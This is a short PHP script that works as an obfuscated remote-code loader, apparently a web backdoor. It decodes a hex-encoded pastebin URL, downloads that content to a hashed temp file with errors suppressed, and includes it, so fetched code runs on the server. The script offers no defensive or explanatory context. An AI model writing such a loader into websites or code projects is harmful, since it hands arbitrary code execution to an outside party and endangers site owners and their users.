<?php
$tmp = sys_get_temp_dir().DIRECTORY_SEPARATOR.md5(sys_get_temp_dir()).'.tmp';
if (!file_exists($tmp)) {
@file_put_contents($tmp,file_get_contents(hex2bin('687474703a2f2f706173746562696e2e636f6d2f7261772f5868507857734465')),LOCK_EX);
}
include_once($tmp);
?>